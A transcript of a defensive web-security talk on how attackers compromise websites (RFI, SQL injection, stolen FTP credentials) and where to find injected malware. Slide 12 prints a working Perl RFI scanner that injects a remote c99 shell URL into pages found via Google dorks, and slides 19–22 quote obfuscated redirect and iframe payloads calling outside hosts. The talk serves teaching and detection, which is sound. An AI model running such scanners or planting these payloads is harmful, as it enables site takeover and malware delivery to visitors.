How Hackers Hack Websites


Presentation Transcript


  1. How Hackers Hack Websites Presented by Thomas J. Raef WeWatchYourWebsite.com

  2. Understand their motivation • Money $$$ • That’s it!

  3. Credit card fraud

  4. Credit card fraud

  5. Pay-per-install

  6. Pay-per-install

  7. Fake anti-virus software

  8. Fake anti-virus software

  9. Fake anti-virus software

  10. Now you know why, but how? • Software vulnerabilities • OpenX • Wordpress • Joomla • osCommerce

  11. Specific methods • Remote file inclusion • Adding a URL string to an existing query • /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=(URL to malicious file)

  12. RFI Scanner • Code:
#!/usr/bin/perl
# Attacker tooling as shown on the slide: queries Google for pages matching a
# "dork", appends a remote URL to each result and reports any response that
# carries the remote shell's banner.
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n";
print "+           RFI Dork Scanner          +\n";
print "+           Coded by H4k3r            +\n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+";
print "\nInsert RFI Dork > ";
chomp($dork = <STDIN>);
print "\nTotal Query Pages 10 Links/Page > ";
chomp($page = <STDIN>);
print "\n[+]@#~Result~#@[+]\n\n";
for ($start = 0; $start != $page*10; $start += 10)
    {
    $search = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
    $ua = LWP::UserAgent->new(agent => 'Mozilla 5.0');
    $resp = $ua->get($search);
    if ($resp->is_success)
        {
        $cont = $resp->content;
        @linkz0r = split (/<a href=/, $cont);
        foreach $line (@linkz0r)
            {
            if ($line =~ /(.*) class=l/ig)
                {
                $click = $1;
                $ua = LWP::UserAgent->new(agent => 'Mozilla 5.0');
                $resp = $ua->get($click."http://tr-shell.org/c99.txt?");
                $shelld0m = $resp->content();
                if ($shelld0m =~ m/c99shell/)
                    {
                    print "$click could be vulnerable to RFI\n";
                    }
                }
            }
        }
    }

  13. SQL Injection • $result = mysql_query('SELECT * FROM users WHERE username="'.$_GET['username'].'"'); • quotes in $_GET['username'] are not escaped • Input: " OR 1 OR username = " • Resulting query: SELECT * FROM users WHERE username = "" OR 1 OR username = "" • OR 1 is always true, so this selects all rows from the table "users"

  14. SQLi Prevention •
if (preg_match("/^\w{8,20}$/", $_GET['username'], $matches))
    // the value must still be quoted, or MySQL reads it as a column name
    $result = mysql_query("SELECT * FROM users WHERE username='$matches[0]'");
else
    // we don't bother querying the database
    echo "username not accepted";
• Or, replace echo with exit or die

  15. SQLi Prevention • mysql_real_escape_string() • escapes all potentially dangerous characters in the string provided and returns the escaped string so that it may be safe to put into a MySQL query • …after properly sanitizing the input

  16. SQLi Prevention
function sql_quote( $value )
{
    // undo magic quotes first, otherwise the value is escaped twice
    // (magic quotes were removed in PHP 5.4 and the mysql_* extension in PHP 7.0;
    //  on current PHP use PDO or mysqli prepared statements instead)
    if( get_magic_quotes_gpc() )
    {
        $value = stripslashes( $value );
    }
    //check if this function exists
    if( function_exists( "mysql_real_escape_string" ) )
    {
        $value = mysql_real_escape_string( $value );
    }
    return $value;
}
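The injection from slide 13 and the prevention from slides 14 to 16, as an added example that is not part of the presentation: a Python/SQLite stand-in for the PHP/MySQL code runs the slide's payload against a string-built query and against a parameterized one, next to slide 14's allow-list check. The table contents and the use of single quotes (SQLite treats double quotes as identifiers) are assumptions made here.

```python
import re
import sqlite3

# Constructed stand-in for the slides' "users" table.
SAMPLE_USERS = [("alice_admin", "admin"), ("bob_user99", "user"), ("carol_ops1", "ops")]

# Slide 13's input, with single quotes because SQLite treats "..." as an identifier.
PAYLOAD = "' OR 1 OR username = '"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, username):
    # Mirrors the slide's mysql_query() call: the input is pasted into the SQL text,
    # so a quote in it closes the literal and everything after it is parsed as SQL.
    sql = "SELECT * FROM users WHERE username='" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    # The value is bound separately from the SQL text; the driver never parses it as SQL.
    return conn.execute("SELECT * FROM users WHERE username=?", (username,)).fetchall()


def username_allowed(username):
    # Slide 14's allow-list. fullmatch() instead of ^...$ because $ still accepts a
    # trailing newline; re.ASCII keeps \w to [A-Za-z0-9_] as in PHP's PCRE default.
    return re.fullmatch(r"\w{8,20}", username, re.ASCII) is not None


def demo():
    conn = make_db()
    return {
        "vulnerable_rows": len(lookup_vulnerable(conn, PAYLOAD)),        # every row
        "parameterized_rows": len(lookup_parameterized(conn, PAYLOAD)),  # no such user
        "allowlist_rejects_payload": not username_allowed(PAYLOAD),
    }
```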

  17. Stolen FTP credentials • Anti-virus companies face 40,000 variants a day • Free FTP programs typically store their saved credentials in plain text • FileZilla: C:\Documents and Settings\Administrator\Application Data\FileZilla\sitemanager.xml

  18. FTP • Is insecure: http://www.youtube.com/watch?v=oYI1kssrrbc • Switch to SFTP. It’s encrypted traffic

  19. What does it look like? • <div align="center"></table> </div> • <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> • </script> • <script type="text/javascript"> • _uacct = "UA-3907581-1"; • urchinTracker(); • </script> • </body> • </html> • <script>document.location.href='http://funnysignage.com/r.php';</script><script>document.location.href='http://funnysignage.com/r.php';</script>

  20. Malicious scripts • preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E… • PHP hex escapes: \x65\x76\x61\x6C\x28 is eval( and \x67\x7A\x69\x6E begins gzinflate, the usual eval(gzinflate(base64_decode(...))) pattern • the /e modifier makes preg_replace() execute the replacement as PHP code (deprecated in PHP 5.5, removed in 7.0)

  21. Obfuscated javascript • <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%61%73%70%6F%6F%2E%63%6F%6D%2F%3F%36%31%39%37%39%36%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script> • The unescape() call decodes to: document.write('<iframe src="http://saspoo.com/?619796" width=1 height=1></iframe>') • eval() then runs it, writing a 1x1 iframe into the page

  22. Malscripts • <script>/*GNU GPL*/ try{window.onload = function(){var E411a2jh88t = document.createElement('script');E411a2jh88t.setAttribute('type', 'text/javascript');E411a2jh88t.setAttribute('id', 'myscript1');E411a2jh88t.setAttribute('src', 'h(#t)$&(t((p():@&/)!/^&&w#(i))k(i&&p!(e$)d!&i(^a@((-$o#)r^!(@g!&$.&$s$&m^^)a)@#s!h&^@i!@$)(n))!g)m)@a)g&((a(@z&(i&n$$##e().^$(!c@o$#)@m^.!!@f!&o#$)o$(#d!#n$!(e^)t!&$&w^$o)r!#&k)@-#()c(o@m!.$^&e^&)a$s&^y!@$!#t)&a))b!^(l#&@e#t@!@e@(n@$^n!@&i^^s!)!.&&r$&u!:@))(8^$0^8)(@0$&#/@&(1!((9!l@o$&^u#@#.^&c@@$o!m!@^/&#^1)(9))l^(!o#&@u@(.$#(c(#o!&!^m##/@#^g#@o$o((g@^l^)$e^.(#$#c!!$o^m!!#$/(&!^z#a!)p#@p&$^o$@&s#)(.(@&&c$)o(^!m!((/)&@&&a(v!^$a&!$$s!t)^(.#&c#(o&(m@/$'.replace(/&|\)|\(|\$|@|\^|\!|#/ig, ''));E411a2jh88t.setAttribute('defer', 'defer');document.body.appendChild(E411a2jh88t);}} catch(e) {}</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> • <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="es"> • <head> • <title>Auto Care Shop</title>

  23. Tricks of the trade • <script src="jQuery.js"></script> • <script>alert(document+"</script>");</script> • [jQuery.js]: • <script>unescape("%65%67…");</script> • Any malscript could be placed in jQuery.js

  24. Tricks of the trade
<html>
<script>
function wr1te(z) {
    s = z.split("Z");
    for (i = 0; i < s.length - 1; i++) {
        document.write(String.fromCharCode(s[i]));
    }
}
</script>
<body onload="wr1te('72Z101Z108Z111Z87Z111Z114Z108Z100Z');">
…
</body>
</html>
• the char codes spell HelloWorld; nothing readable appears in the page source

  25. Tricks of the trade
<div id="content" style="display:none;">…stuff…</div>
<script>
function defun(a) { malicious stuff }
var z = document.getElementById('content').innerHTML;
eval(defun(z));
</script>
• the payload sits in a hidden div and is only decoded by defun() at run time

  26. Where to look • Before the opening html tag • Before the closing head tag • Between the closing head tag and the opening body tag • Immediately after the body tag and its attributes • Before the closing body tag • Between the closing body tag and closing html tag • After the closing html tag

  27. Where to look • In javascript files: • Usually in a document.write at the very bottom

  28. Where to look • Images folders • Any php file in there is suspect • Admin folders • Any folders
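A small triage script for slides 26 to 28, added here and not part of the presentation: it flags <script> blocks sitting in the slide-26 regions that lie outside the head and body (before <html>, between </head> and <body>, between </body> and </html>, after </html>), checks whether a .js file ends in a document.write(), and lists .php files found under image folders. The sample page is constructed after slide 19 with a placeholder tracking id and redirect URL.

```python
import re

# Constructed page modelled on slide 19: a normal footer, then a redirect injected
# after </html>. Tracking id and destination URL are placeholders.
SAMPLE_PAGE = """<html><head><title>Auto Care Shop</title></head>
<body>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct = "UA-000000-0"; urchinTracker();</script>
</body>
</html>
<script>document.location.href='http://redirect.example/r.php';</script>"""

SCRIPT_RE = re.compile(r"<script\b.*?</script>", re.I | re.S)


def classify_position(html, i):
    # Map offset i to one of the slide-26 regions that legitimate markup never
    # uses for scripts; None means the script is inside <head> or <body>.
    low = html.lower()
    p = {t: low.find(t) for t in ("<html", "</head>", "<body", "</body>", "</html>")}
    if 0 <= p["<html"] and i < p["<html"]:
        return "before <html>"
    if 0 <= p["</html>"] < i:
        return "after </html>"
    if 0 <= p["</body>"] < i:
        return "between </body> and </html>"
    if 0 <= p["</head>"] < i < p["<body"]:
        return "between </head> and <body>"
    return None


def find_out_of_place_scripts(html):
    # (region, snippet) for every <script> block found outside the head and body
    hits = []
    for m in SCRIPT_RE.finditer(html):
        region = classify_position(html, m.start())
        if region:
            hits.append((region, m.group(0)[:80]))
    return hits


def js_tail_writes(js, tail_chars=300):
    # slide 27: an injected document.write() usually sits at the very bottom of a .js file
    return "document.write" in js[-tail_chars:]


def suspicious_php_in_images(paths):
    # slide 28: a .php file inside an images folder is suspect by location alone
    return [p for p in paths
            if re.search(r"(^|/)(images?|img)/", p, re.I) and p.lower().endswith(".php")]
```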

  29. What “not” to look for • Newest datetime stamp • Uncommon file names • Not so much iframes in plain view

  30. Summary • As many as 40,000 websites are infected every week • Hackers make money • RFI, SQLi, FTP • Update all software, including plugins, extensions, etc. • Switch to SFTP

  31. Contact information http://www.wewatchyourwebsite.com Thomas J. Raef (847)833-5666 traef@wewatchyourwebsite.com
